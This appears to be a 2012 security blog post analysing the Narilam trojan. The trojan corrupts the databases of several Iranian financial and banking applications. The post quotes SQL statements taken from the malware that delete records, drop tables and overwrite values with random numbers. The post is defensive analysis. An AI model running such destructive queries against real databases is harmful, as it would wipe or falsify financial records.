Friday, November 30, 2012

"Narilam" Malware Attacks Iranian Financial Infrastructure

Iranian infrastructure has been consistently under the radar of the attackers since last couple of years ..We have already witnessed some of the most organized and sopisticated attacks like Stuxnet , Duqu and similar crimes against them in the past . We have come across yet another attack against Iran which is primarily targetting MSSQL Databases of few Iranian Financial softwares.This attack has been named as "Narilam" because one of the financial software that it targets, named "Malyran".

I analyzed several samples of this malware, one of which was about 2MB. From the binaries’ headers, it looks as though this attack has been going on for a while: The Trojan was compiled with Borland C++ in 2010.










While one of the samples I looked at had a timestamp way back of 2002 ..Although these headers could have been faked, while analyzing the code we found the date April 25, 2010, which leads us to believe that this threat has existed for more than two years.












The Iranian CERT team has published an alert for this malware, indicating that Narilam has been known since 2010 by a different name.

Targets of Narilam malware :

The installation process of this malware is fairly standard in creating the start-up registry entries and copying itself as lsass.exe into the system directory. It targets certain SQL databases and tables of the following Iranian finance and banking software.

Maliran (integrated financial and applications software)
Shahd (integrated financial, commercial, and retail software)
Amin (banking software)

Narilam checks for the presence of these software and exits the infected systems if it does not find them.



Although the malware code doesn’t seem to employ any sophisticated techniques compared with its predecessors, it can connect to the specific databases via OLE DB and send SQL queries to update or delete records and drop certain tables with specific names. Here are some of the SQL queries that we’ve found in the code:
  • Update Asnad Set SanadNo=@SanadNo1,LastNo=@SanadNo1,FirstNo=@SanadNo1 Where Cast(SanadNo as int)=@SanadNo and Raj=@Raj
  • Set @SanadNo=(select Max(Cast(sellercod As int )) from A_Sellers
  • Delete from A_Sellers Where Cast(sellercod as int)=@SanadNo
  • Update A_TranSanj Set Tranid=@SanadNo1 Where Cast(Tranid as int)=@SanadNo and Raj=@Raj
  • Delete from Koll Where Cast(Koll as int)=@SanadNo
  • Delete from Moein Where Cast(Moein as int)=@SanadNo
  • Drop table Holiday_1
  • Set @SanadNo=Round(@SanadNo * (SELECT RAND(@IDLE)),0,0
  • Set @Raj=(select Max(Raj) from R_DetailFactoreForosh Where Cast(SanadNoForosh as int)=@SanadNo
  • Update R_DetailFactoreForosh Set SanadNoForosh=@SanadNo1 Where Cast(SanadNoForosh as int)=@SanadNo and Raj=@Raj
 

Here are the some of the database tables that Narilam targets for updating and deleting records:

Holiday_1
Holiday_2
A_Sellers
A_TranSanj
Koll
R_DetailFactoreForosh
Moein
Tafsily
Vamghest

Some of the table dropped from the database:

Holiday_1
Holiday_2
A_Sellers

We also came across the SQL query that tries to access MS SQL Server's sysobjects table.
















Binary also contains the sequence of code to further corrupt the database with random values











All the financial and banking software targeted by this malware are products of the Iranian company Tarrah Systems, which issued a warning on its website about W32.Narilam a couple of days ago. The company asked its customers to backups their databases if they are using the targeted products.








While analyzing multiple samples of this malware, it seems this code was written to corrupt and delete databases accessed by these software, thereby causing potential financial losses to users. Possible targets of Narilam are corporates and banks that are likely to have these applications installed.It is recommended that users of these applications regularly backup their databases in order to avoid any kind of havoc.

No comments:

Post a Comment